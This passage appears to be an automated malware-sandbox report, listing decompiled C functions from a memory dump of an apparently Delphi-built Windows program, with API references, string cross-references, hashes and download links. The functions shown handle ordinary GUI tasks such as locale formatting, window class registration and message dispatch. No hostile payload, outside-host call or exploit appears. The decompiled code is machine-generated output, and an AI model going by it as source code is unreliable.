					} else {
						while(_t92 <= E00404600(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E00404528();
									E00404608(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E00409EB9);
				return E0040436C( &_v24, 4);
			}

0x00409ce8
0x00409ced
0x00409cee
0x00409cef
0x00409cf0
0x00409cf1
0x00409cf5
0x00409cf7
0x00409cfb
0x00409cfc
0x00409d01
0x00409d04
0x00409d07
0x00409d0e
0x00409d26
0x00409d3e
0x00409e88
0x00409e8a
0x00409e8f
0x00409e91
0x00000000
0x00000000
0x00409da7
0x00409dac
0x00409db3
0x00409df1
0x00409df6
0x00409df8
0x00409e17
0x00409e1c
0x00409e1e
0x00409e3f
0x00409e44
0x00409e46
0x00409e5b
0x00409e5b
0x00409e5d
0x00409e63
0x00409e6a
0x00409e5f
0x00409e5f
0x00409e61
0x00409e78
0x00409e82
0x00000000
0x00000000
0x00000000
0x00409e61
0x00409e48
0x00409e4f
0x00409e54
0x00409e54
0x00409e20
0x00409e27
0x00409e2c
0x00409e2c
0x00409dfa
0x00409e01
0x00409e06
0x00409e06
0x00409e87
0x00409e87
0x00409db5
0x00409dbe
0x00409dcc
0x00409dd6
0x00409ddb
0x00409ddb
0x00409db3
0x00409d44
0x00409d44
0x00409d49
0x00409d4c
0x00409d5a
0x00409d56
0x00409d56
0x00409d56
0x00409d5e
0x00409d99
0x00409d60
0x00409d85
0x00409d66
0x00409d66
0x00409d68
0x00409d6a
0x00409d6c
0x00409d75
0x00409d7f
0x00409d7f
0x00409d6c
0x00409d84
0x00409d84
0x00409d84
0x00409d90
0x00409d5e
0x00409e97
0x00409e99
0x00409e9c
0x00409e9f
0x00409eb1

APIs

GetThreadLocale.KERNEL32(?,00000000,00409EB2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409D17

Part of subcall function 004099B0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099CE

Strings

yyyy, xrefs: 00409E09
ggg, xrefs: 00409DFC
eeee, xrefs: 00409E22

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 17bddf546044935fcbc3064db17a53d4116d1eedd6881555b156d6c6746cd119
Instruction ID: c2f76db8bbbdb6168a2e3f88b395cd33782f4f460061de2cfd9d1bf4bcd30a7e
Opcode Fuzzy Hash: 17bddf546044935fcbc3064db17a53d4116d1eedd6881555b156d6c6746cd119
Instruction Fuzzy Hash: A441E3B13041014BC711FAA9C8816BFB296DFC5308B64453BE995B37C7EA3D9C0286AE

Uniqueness

Uniqueness Score: -1.00%

Function 00442F68, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00442F68(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr* _v20;
				char _v36;
				intOrPtr _t69;
				void* _t90;
				intOrPtr _t108;
				void* _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				intOrPtr _t122;

				_t120 = _t121;
				_t122 = _t121 + 0xffffffe0;
				_v12 = __edx;
				_v8 = __eax;
				E00412B80( *((intOrPtr*)(_v8 + 0x34)), 0,  &_v36,  *((intOrPtr*)(_v8 + 0x30)));
				E004439E4(_v8);
				 *[fs:eax] = _t122;
				_v16 = E004242A0(1);
				 *[fs:eax] = _t122;
				 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x4430d3, _t120,  *[fs:eax], 0x4430f0, _t120, __edi, __esi, __ebx, _t119);
				 *((intOrPtr*)( *_v16 + 0x40))();
				_v20 = E004242A0(1);
				 *[fs:eax] = _t122;
				E004256B8(_v20, 1);
				 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x4430b6, _t120);
				 *((intOrPtr*)( *_v20 + 0x40))();
				_t69 = _v12;
				_push(_t69);
				L00426A24();
				_t117 = _t69 - 1;
				if(_t117 >= 0) {
					_t118 = _t117 + 1;
					_t90 = 0;
					do {
						E00420284(E00424868(_v16),  &_v36);
						_push(0);
						_push(0);
						_push(0);
						_push(E00420704(_t74));
						_push(_t90);
						_push(_v12);
						L00426A5C();
						E00420284(E00424868(_v20),  &_v36);
						_push(0x10);
						_push(0);
						_push(0);
						_push(E00420704(_t81));
						_push(_t90);
						_push(_v12);
						L00426A5C();
						E00442B3C(_v8, _t90, _v20, _v16, _t118, 0);
						_t90 = _t90 + 1;
						_t118 = _t118 - 1;
					} while (_t118 != 0);
				}
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x4430bd);
				return E004035DC(_v20);
			}

0x00442f69
0x00442f6b
0x00442f71
0x00442f74
0x00442f8c
0x00442f94
0x00442fa4
0x00442fb3
0x00442fc1
0x00442fcf
0x00442fdd
0x00442fec
0x00442ffa
0x00443002
0x00443012
0x00443020
0x00443023
0x00443026
0x00443027
0x0044302e
0x00443031
0x00443033
0x00443034
0x00443036
0x00443045
0x0044304a
0x0044304c
0x0044304e
0x00443057
0x00443058
0x0044305c
0x0044305d
0x00443071
0x00443076
0x00443078
0x0044307a
0x00443083
0x00443084
0x00443088
0x00443089
0x00443097
0x0044309c
0x0044309d
0x0044309d
0x00443036
0x004430a2
0x004430a5
0x004430a8
0x004430b5

APIs

73451FD0.COMCTL32(?,?,?,00000000,004430F0), ref: 00443027

Part of subcall function 00420284: FillRect.USER32 ref: 004202AC

73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,004430F0), ref: 0044305D
73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00443089

Part of subcall function 00442B3C: 734520C0.COMCTL32(?,00000000,00000000,00000000,00442BCE,?,00000000,00442BEB), ref: 00442BB0

Strings

A, xrefs: 00442FA9, 00442FE2

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 73452500$73451734520FillRect
String ID: A
API String ID: 3869139703-2078354741
Opcode ID: b4ffc3f47e7deb19502ac242df4b656891a4a915ffacd21f13dcba7425699d3d
Instruction ID: 77afc3dafbf1cdd448c97966df04d146874992a2a85c17ee3dadf89815f4e08c
Opcode Fuzzy Hash: b4ffc3f47e7deb19502ac242df4b656891a4a915ffacd21f13dcba7425699d3d
Instruction Fuzzy Hash: 78411B74B00218EFD711EFA6D881EAEB7F9FB49704F9145A6F800AB351CA39AD01CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00439304, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00439304(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
				char _v68;
				struct _WNDCLASSA _v108;
				intOrPtr _v116;
				signed char _v137;
				void* _v144;
				struct _WNDCLASSA _v184;
				char _v188;
				char _v192;
				char _v196;
				int _t47;
				void* _t48;
				intOrPtr _t75;
				intOrPtr _t93;
				intOrPtr _t97;
				void* _t98;
				intOrPtr* _t100;
				void* _t104;

				_t98 = __edi;
				_t83 = __ebx;
				_push(__ebx);
				_v196 = 0;
				_t100 = __eax;
				_push(_t104);
				_push(0x43948f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t104 + 0xffffff40;
				_t84 =  *__eax;
				 *((intOrPtr*)( *__eax + 0x98))();
				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
					L7:
					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
					asm("sbb eax, eax");
					_t48 = _t47 + 1;
					if(_t48 == 0 || E004329A0 != _v184.lpfnWndProc) {
						if(_t48 != 0) {
							UnregisterClassA( &_v68, _v108.hInstance);
						}
						_v108.lpfnWndProc = E004329A0;
						_v108.lpszClassName =  &_v68;
						if(RegisterClassA( &_v108) == 0) {
							E0040B30C(_t83, _t84, _t98, _t100);
						}
					}
					 *0x476900 = _t100;
					_t85 =  *_t100;
					 *((intOrPtr*)( *_t100 + 0x9c))();
					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
						E0040B30C(_t83, _t85, _t98, _t100);
					}
					E00408E2C( *((intOrPtr*)(_t100 + 0x64)));
					 *((intOrPtr*)(_t100 + 0x64)) = 0;
					E0043C504(_t100);
					E00436D28(_t100, E0041F414( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
					_t117 =  *((char*)(_t100 + 0x5c));
					if( *((char*)(_t100 + 0x5c)) != 0) {
						E004037D8(_t100, _t117);
					}
					_pop(_t93);
					 *[fs:eax] = _t93;
					_push(0x439496);
					return E00404348( &_v196);
				} else {
					_t83 =  *((intOrPtr*)(__eax + 4));
					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
						L6:
						_v192 =  *((intOrPtr*)(_t100 + 8));
						_v188 = 0xb;
						_t75 =  *0x49115c; // 0x41d518
						E00406548(_t75,  &_v196);
						_t84 = _v196;
						E0040A194(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
						E00403DA8();
					} else {
						_t97 =  *0x431d04; // 0x431d50
						if(E00403768(_t83, _t97) == 0) {
							goto L6;
						}
						_v116 = E0043C1F4(_t83);
					}
					goto L7;
				}
			}

0x00439304
0x00439304
0x0043930d
0x00439311
0x00439317
0x0043931b
0x0043931c
0x00439321
0x00439324
0x0043932f
0x00439331
0x0043933b
0x004393b0
0x004393b3
0x004393c8
0x004393d0
0x004393d2
0x004393d5
0x004393e6
0x004393f0
0x004393f0
0x004393f5
0x004393ff
0x0043940e
0x00439410
0x00439410
0x0043940e
0x00439415
0x00439423
0x00439425
0x00439432
0x00439434
0x00439434
0x0043943c
0x00439443
0x00439448
0x00439460
0x00439465
0x00439469
0x00439471
0x00439471
0x00439478
0x0043947b
0x0043947e
0x0043948e
0x00439346
0x00439346
0x0043934b
0x00439370
0x00439373
0x00439379
0x0043938f
0x00439394
0x00439399
0x004393a6
0x004393ab
0x00439353
0x00439355
0x00439362
0x00000000
0x00000000
0x0043936b
0x0043936b
0x00000000
0x0043934b

APIs

GetClassInfoA.USER32 ref: 004393C8
UnregisterClassA.USER32 ref: 004393F0
RegisterClassA.USER32 ref: 00439406

Strings

@, xrefs: 0043933D

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$InfoRegisterUnregister
String ID: @
API String ID: 3749476976-2766056989
Opcode ID: 4978b6c09712402e4c4fc02ea75a6312b411d7da4883799cb57afb89c19d0253
Instruction ID: c8ad39c23a5991b2574368495f38e56e8604bba2fa955fb7ae72dfc94ddaed53
Opcode Fuzzy Hash: 4978b6c09712402e4c4fc02ea75a6312b411d7da4883799cb57afb89c19d0253
Instruction Fuzzy Hash: AD418C70A043589BDB20EF69CC81B9E77F9AF48304F0051BAE849E7391DB78AD45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00433D54, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00433D54(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
				intOrPtr _v16;
				intOrPtr _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				struct HWND__* _t38;
				intOrPtr _t39;
				intOrPtr* _t41;
				intOrPtr _t45;
				intOrPtr _t49;
				intOrPtr* _t53;
				long _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr* _t65;
				intOrPtr _t66;
				intOrPtr _t70;
				intOrPtr* _t77;
				void* _t79;
				intOrPtr* _t80;
				long long _t87;

				_t87 = __fp0;
				_t80 = _t79 + 0xfffffff8;
				_t70 = __ecx;
				_t45 = __edx;
				_t77 = __eax;
				 *0x492b8c = __eax;
				_t24 =  *0x492b8c; // 0x0
				 *((intOrPtr*)(_t24 + 4)) = 0;
				GetCursorPos(0x492b98);
				_t26 =  *0x492b8c; // 0x0
				_t58 = 0x492b98->x; // 0x0
				 *(_t26 + 0xc) = _t58;
				_t59 =  *0x492b9c; // 0x0
				 *((intOrPtr*)(_t26 + 0x10)) = _t59;
				 *0x492ba0 = GetCursor();
				_t28 =  *0x492b8c; // 0x0
				 *0x492b94 = E00432F94(_t28);
				 *0x492ba4 = _t70;
				_t60 =  *0x430ae0; // 0x430b2c
				if(E00403768(_t77, _t60) == 0) {
					__eflags = _t45;
					if(__eflags == 0) {
						 *0x492ba8 = 0;
					} else {
						 *0x492ba8 = 1;
					}
				} else {
					_t65 = _t77;
					_t4 = _t65 + 0x44; // 0x44
					_t41 = _t4;
					_t49 =  *_t41;
					if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t65 + 0x20)) = 0;
						 *((intOrPtr*)(_t65 + 0x24)) = 0;
					} else {
						 *_t80 =  *((intOrPtr*)(_t65 + 0xc)) - _t49;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 8)) -  *_t41;
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t65 + 0x20)) = __fp0;
						asm("wait");
					}
					_t66 =  *((intOrPtr*)(_t41 + 4));
					if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
						__eflags = 0;
						 *((intOrPtr*)(_t77 + 0x28)) = 0;
						 *((intOrPtr*)(_t77 + 0x2c)) = 0;
					} else {
						_t53 = _t77;
						 *_t80 =  *((intOrPtr*)(_t53 + 0x10)) - _t66;
						asm("fild dword [esp]");
						_v16 =  *((intOrPtr*)(_t41 + 0xc)) -  *((intOrPtr*)(_t41 + 4));
						asm("fild dword [esp+0x4]");
						asm("fdivp st1, st0");
						 *((long long*)(_t53 + 0x28)) = _t87;
						asm("wait");
					}
					if(_t45 == 0) {
						 *0x492ba8 = 0;
					} else {
						 *0x492ba8 = 2;
						 *((intOrPtr*)( *_t77 + 0x30))();
					}
				}
				_t32 =  *0x492b8c; // 0x0
				 *0x492bac =  *((intOrPtr*)( *_t32 + 8))();
				_t85 =  *0x492bac;
				if( *0x492bac != 0) {
					_t37 =  *0x492b9c; // 0x0
					_t38 = GetDesktopWindow();
					_t39 =  *0x492bac; // 0x0
					E0043DA18(_t39, _t38, _t85, _t37);
				}
				_t35 = E004035AC(1);
				 *0x492bb4 = _t35;
				if( *0x492ba8 != 0) {
					_t35 = E00433A84(0x492b98, 1);
				}
				return _t35;
			}

0x00433d54
0x00433d57
0x00433d5a
0x00433d5c
0x00433d5e
0x00433d60
0x00433d66
0x00433d6d
0x00433d75
0x00433d7a
0x00433d7f
0x00433d85
0x00433d88
0x00433d8e
0x00433d96
0x00433d9b
0x00433da5
0x00433daa
0x00433db2
0x00433dbf
0x00433e51
0x00433e53
0x00433e5e
0x00433e55
0x00433e55
0x00433e55
0x00433dc5
0x00433dc5
0x00433dc7
0x00433dc7
0x00433dcd
0x00433dd3
0x00433df5
0x00433df7
0x00433dfa
0x00433dd5
0x00433dda
0x00433ddd
0x00433de5
0x00433de9
0x00433ded
0x00433def
0x00433df2
0x00433df2
0x00433e00
0x00433e07
0x00433e2c
0x00433e2e
0x00433e31
0x00433e09
0x00433e09
0x00433e10
0x00433e13
0x00433e1c
0x00433e20
0x00433e24
0x00433e26
0x00433e29
0x00433e29
0x00433e36
0x00433e48
0x00433e38
0x00433e38
0x00433e43
0x00433e43
0x00433e36
0x00433e65
0x00433e6f
0x00433e74
0x00433e7b
0x00433e7d
0x00433e83
0x00433e90
0x00433e95
0x00433e95
0x00433ea1
0x00433ea6
0x00433eb2
0x00433eb9
0x00433eb9
0x00433ec3

APIs

GetCursorPos.USER32(00492B98), ref: 00433D75
GetCursor.USER32(00492B98), ref: 00433D91

Part of subcall function 00432F94: SetCapture.USER32(00000000,?,00433DA5,00492B98), ref: 00432FA3

GetDesktopWindow.USER32 ref: 00433E83

Strings

-C, xrefs: 00433E9C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Cursor$CaptureDesktopWindow
String ID: -C
API String ID: 669539147-734977625
Opcode ID: ca48cc84ca0dd6cc0cf6e9fb9e9006a99ceffaa155bb66273fd42df2dea659f8
Instruction ID: 2eaacaf76be489e86d716aee7ead0c638bf8eedc68e3a9194ff12353d0ce47fc
Opcode Fuzzy Hash: ca48cc84ca0dd6cc0cf6e9fb9e9006a99ceffaa155bb66273fd42df2dea659f8
Instruction Fuzzy Hash: 3F417C74604200AFC308DF2DEA45616BBE1AB98315F25857FE4498B3A2DBB5E841CB88

Uniqueness

Uniqueness Score: -1.00%

Function 00455C78, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 80
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00455C78(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x455d86);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t55 = E00455BF4(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t51 = _v8;
					_t79 =  *((intOrPtr*)(_t51 + 0x48));
					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
						E004561CC(_v8);
					}
				}
				E00453D80(_t55,  &_v20);
				E00432CEC(_v20, 0,  &_v16, _t79);
				_t36 =  *0x492c04; // 0x2410d40
				E00455E34(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x455d2f);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0xea)) != 0) {
					 *((intOrPtr*)(_v8 + 0xe8))();
				}
				if(_v9 != 0) {
					E00455B90();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x491298; // 0x492030
				if(_t41 ==  *_t67 && E0041C04C() != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00455D8D);
				return E0040436C( &_v20, 2);
			}

0x00455c79
0x00455c7b
0x00455c83
0x00455c86
0x00455c89
0x00455c8e
0x00455c8f
0x00455c94
0x00455c97
0x00455ca2
0x00455cae
0x00455cb0
0x00455cb3
0x00455cb7
0x00455cbc
0x00455cbc
0x00455cb7
0x00455cc6
0x00455cd1
0x00455cd9
0x00455cde
0x00455ce3
0x00455ce9
0x00455cea
0x00455cef
0x00455cf2
0x00455d00
0x00455d11
0x00455d11
0x00455d1b
0x00455d20
0x00455d20
0x00455d27
0x00455d2a
0x00455d44
0x00455d49
0x00455d51
0x00455d5c
0x00455d5c
0x00455d64
0x00455d66
0x00455d66
0x00455d6d
0x00455d70
0x00455d73
0x00455d85

APIs

Part of subcall function 00455BF4: GetCursorPos.USER32 ref: 00455BFD

GetCurrentThreadId.KERNEL32 ref: 00455D44
WaitMessage.USER32(00000000,00455D86,?,?,?,dZG), ref: 00455D66

Strings

dZG, xrefs: 00455C7E
0 I, xrefs: 00455D49

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentCursorMessageThreadWait
String ID: 0 I$dZG
API String ID: 535285469-2938273626
Opcode ID: 3d681111c8618528a4e1041365c9b9f13b08f4b4b6371d64dceb3201248204a9
Instruction ID: aee61bb921914333cf1fbbfcb3916a5d260a496205d63880cac9e805c0785e19
Opcode Fuzzy Hash: 3d681111c8618528a4e1041365c9b9f13b08f4b4b6371d64dceb3201248204a9
Instruction Fuzzy Hash: D131B330A04648EFDB11DFA4D856BAEB7F5EB05304F5184BAEC00A7392D7786E48CB19

Uniqueness

Uniqueness Score: -1.00%

Function 00469248, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E00469248(void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				void* _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;

				_t51 = _t52;
				_t53 = _t52 + 0xffffffec;
				_v8 = 0;
				_push(_t51);
				_push(0x469320);
				_push( *[fs:eax]);
				 *[fs:eax] = _t53;
				if( *0x492c98 != 0) {
					L6:
					_pop(_t45);
					 *[fs:eax] = _t45;
					_push(0x469327);
					return E00404348( &_v8);
				} else {
					E004043E0( &_v8, "comctl32.dll");
					_push( &_v12);
					_t24 = E004047F8(_v8);
					_t49 = _t24;
					_push(_t49);
					L00406AAC();
					_t40 = _t24;
					if(_t40 == 0) {
						goto L6;
					} else {
						_v16 = E00402754(_t40);
						_push(_t51);
						_push(0x4692fd);
						_push( *[fs:eax]);
						 *[fs:eax] = _t53;
						_push(_v16);
						_push(_t40);
						_t29 = _v12;
						_push(_t29);
						_push(_t49);
						L00406AA4();
						if(_t29 != 0) {
							_push( &_v24);
							_push( &_v20);
							_push("\\");
							_t35 = _v16;
							_push(_t35);
							L00406AB4();
							if(_t35 != 0) {
								 *0x492c98 =  *((intOrPtr*)(_v20 + 8));
							}
						}
						_pop(_t47);
						 *[fs:eax] = _t47;
						_push(0x469304);
						return E00402774(_v16);
					}
				}
			}

0x00469249
0x0046924b
0x00469252
0x00469257
0x00469258
0x0046925d
0x00469260
0x0046926a
0x00469304
0x0046930c
0x0046930f
0x00469312
0x0046931f
0x00469270
0x00469278
0x00469280
0x00469284
0x00469289
0x0046928b
0x0046928c
0x00469291
0x00469295
0x00000000
0x00469297
0x0046929e
0x004692a3
0x004692a4
0x004692a9
0x004692ac
0x004692b2
0x004692b3
0x004692b4
0x004692b7
0x004692b8
0x004692b9
0x004692c0
0x004692c5
0x004692c9
0x004692ca
0x004692cf
0x004692d2
0x004692d3
0x004692da
0x004692e2
0x004692e2
0x004692da
0x004692e9
0x004692ec
0x004692ef
0x004692fc
0x004692fc
0x00469295

APIs

739414E0.VERSION(00000000,?,00000000,00469320), ref: 0046928C
739414C0.VERSION(00000000,?,00000000,?,00000000,004692FD,?,00000000,?,00000000,00469320), ref: 004692B9
73941500.VERSION(?,00469348,?,?,00000000,?,00000000,?,00000000,004692FD,?,00000000,?,00000000,00469320), ref: 004692D3

Strings

comctl32.dll, xrefs: 00469273

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: 739414$73941500
String ID: comctl32.dll
API String ID: 1696551078-431930879
Opcode ID: 65552d942158ec9e7681598cbdf27608651cc30ca3f9d374b749fa70c811db1d
Instruction ID: d40dff72efb8d8445c623cb3f32c012382b88a02f6904c72aaf35b00b2720eb8
Opcode Fuzzy Hash: 65552d942158ec9e7681598cbdf27608651cc30ca3f9d374b749fa70c811db1d
Instruction Fuzzy Hash: 95213D75600208AFDB01EFA5CD919AE73ECEB49300B524476F900E3691E7B89E40CA69

Uniqueness

Uniqueness Score: -1.00%

Function 0045533C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0045533C(void* __eax, char* __ecx, struct tagMSG* __edx) {
				int _t21;
				MSG* _t30;
				void* _t31;
				char* _t32;

				_t22 = __ecx;
				_push(__ecx);
				_t30 = __edx;
				_t31 = __eax;
				_t21 = 0;
				if(PeekMessageA(__edx, 0, 0, 0, 1) != 0) {
					_t21 = 1;
					if(_t30->message == 0x12) {
						 *((char*)(_t31 + 0x9c)) = 1;
					} else {
						 *_t32 = 0;
						if( *((short*)(_t31 + 0xd2)) != 0) {
							_t22 = _t32;
							 *((intOrPtr*)(_t31 + 0xd0))();
						}
						if(E0045529C(_t31, _t30) == 0 &&  *_t32 == 0 && E004551A8(_t31, _t30) == 0 && E004551E4(_t31, _t22, _t30) == 0 && E00455184(_t31, _t30) == 0) {
							TranslateMessage(_t30);
							DispatchMessageA(_t30);
						}
					}
				}
				return _t21;
			}

0x0045533c
0x0045533f
0x00455340
0x00455342
0x00455344
0x00455356
0x00455358
0x0045535e
0x004553c6
0x00455360
0x00455360
0x0045536c
0x0045536e
0x00455378
0x00455378
0x00455389
0x004553b9
0x004553bf
0x004553bf
0x00455389
0x0045535e
0x004553d3

APIs

PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045534F
TranslateMessage.USER32 ref: 004553B9
DispatchMessageA.USER32 ref: 004553BF

Strings

dZG, xrefs: 0045533C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekTranslate
String ID: dZG
API String ID: 4217535847-410245891
Opcode ID: 52db6a5178ac992f7f48b92b63478e97822c7f46f14c61a044fb709eb9ff9181
Instruction ID: 7fd86baadd6340566fa38400ec47d4f9bb55de5063f691e291ee64f212a7f120
Opcode Fuzzy Hash: 52db6a5178ac992f7f48b92b63478e97822c7f46f14c61a044fb709eb9ff9181
Instruction Fuzzy Hash: 9901D220704F4056EA31222A581277F9BA54FD178AF14486FFC89A7383DBEC9C5E426A

Uniqueness

Uniqueness Score: -1.00%

Function 00448AB0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

